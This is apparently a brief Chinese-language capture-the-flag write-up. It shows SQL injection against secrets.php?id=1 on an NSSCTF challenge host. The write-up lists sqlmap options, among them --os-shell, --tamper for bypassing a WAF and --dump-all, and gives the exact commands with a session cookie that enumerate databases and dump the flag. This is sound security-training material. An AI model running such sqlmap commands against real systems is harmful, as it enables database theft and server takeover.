万能密码登录后没发现什么有用的信息


bp抓包之后,看到疑似注入点的提示secrets.php?id=1

### 总结参数作用:
-u 指定目标URL。
-C 指定列名(多个列用逗号分隔)。
-D 指定数据库名。
-T 指定表名。
-r 从文件加载请求,保留请求细节,自动识别注入点。--cookie 允许工具在 HTTP 请求中附加指定的 Cookie 值,模拟已认证用户的会话状态。它解决了 Web 应用中"认证后才有漏洞"的关键问题。--data 指定POST方法发送的数据,sqlmap -u <URL> --data="<POST_DATA>",它在检测 POST 注入漏洞时至关重要。
--columns 枚举指定表中的列。
--tables 枚举指定数据库中的表。
--dump 导出数据。
--dbs 枚举所有数据库 sqlmap -u URL --dbs
--level 测试深度(1-5) --level 3(检测Cookie注入)
--risk 风险等级(1-3) --risk 3(使用危险语句)
--proxy 使用代理 --proxy="http://127.0.0.1:8080"
--tamper 绕过WAF --tamper=space2comment
--forms 自动处理表单,用于自动发现表单并注入。
--batch 无需用户交互,自动选择默认选项。
--current-db 获取当前数据库名。
--dump-all 导出所有数据 sqlmap -u URL --dump-all
--os-shell 获取系统shell sqlmap -u URL --os-shell
提示需要cookie

bp里拿到cookie或者从开发者工具(F12→网络→请求头)中复制`Cookie`头

python sqlmap.py -u "node5.anna.nssctf.cn:23148/secrets.php?id=1" --dbs --cookie=PHPSESSID=eaa075c80b197f1fd072c992dc48ee52
略略
略略
略略
python sqlmap.py -u "node5.anna.nssctf.cn:23148/secrets.php?id=1" -D moectf -T flag -C flAg --dump --cookie=PHPSESSID=eaa075c80b197f1fd072c992dc48ee52

